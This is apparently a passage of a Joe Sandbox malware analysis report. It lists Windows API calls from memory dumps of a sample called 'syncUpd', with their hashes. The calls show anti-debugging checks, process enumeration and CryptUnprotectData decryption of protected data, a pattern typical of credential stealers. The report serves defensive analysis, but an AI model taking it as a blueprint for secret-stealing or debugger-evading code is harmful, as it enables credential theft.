                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 009090AD
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009090C2
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 009090CD
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 009090E9
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 009090F0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction ID: ff9e1287d351f765a26999e8909231e547e8ed326f7367c56e51b7a7db325047
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB21F078A01204EFC320EF64FC44B543BB4FB8C305F91907AE658872A1E7B466868F9D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
                                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3657800372-0
                                                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008F6E84
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F6E8B
                                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008F6EB8
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008F6EDB
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 008F6EE5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2609814428-0
                                                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction ID: 7cae568b4ae2b7f4d7e8d48abadce6b7e0daaf9fe2718c16098a6e5de467d92f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73010075A40708BBDB20DBA4DD45FAE7779EB44B05F104154F705EB2C0DAB0AA118B95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00905F85
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00905F99
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00905FAE
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00905FC3
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00905FE1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction ID: df08cd93163e6aa97acc0019185cd1771151986c398656cc3c3e05ab36018ea6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D012175A10609EFDB20DFA4DD98BEEB7B9BB48300F104589E905D7280DB749B40CF50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,008F50A5,40000001,00000000,00000000), ref: 00905827
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 80407269-0
                                                                                                                                                                                                                                                              • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                              • Instruction ID: ca30a4374b7df0b4d993d497785d7739fca569fcf3988f2460d8f1780dddf6a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311E670604A08AFDB10CFA4D844FA733AAAF89310F11D958FE098B294D675E841DF60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9736
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,008F4E15,00000000,?), ref: 008F9748
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9771
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,008F4E15,00000000,?), ref: 008F9786
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction ID: 35d3d32a610bd1dffb60a27eb5d851210b70ccf3e8b6eec3b767e12beca8f252
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2119074240308AFEB20DF64CC95FAA77B6FB89711F208459FA159B2D0C7B1A941CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                              • Instruction ID: 22004f60f1222c54a672ca6cb3ed1b594e5f4af3c6de3c3bc3ab30aad14aca82
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2314BB6A00609DFDB10CF99C880AADBBF5FF48324F64414AD541E7212D7B1EA45CFA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Offset: 00942000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_942000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                              • Instruction ID: 85f4026c25db6e9ed72d78eccab3a833355819db69b21b411fca5576bee52b89
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14111872340101AFD754DF55DC81EA773AAFB89360B698465E908CB316D679E8428760
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                              • Instruction ID: 1977726e87bd77f5db1896a9366490e6caaceeeeb320a4f47ec0234eb277afc5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E901F272A016088FDF21DF70C804BBA33E9FB86306F1545A4DA0AD7282E370A8418F80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
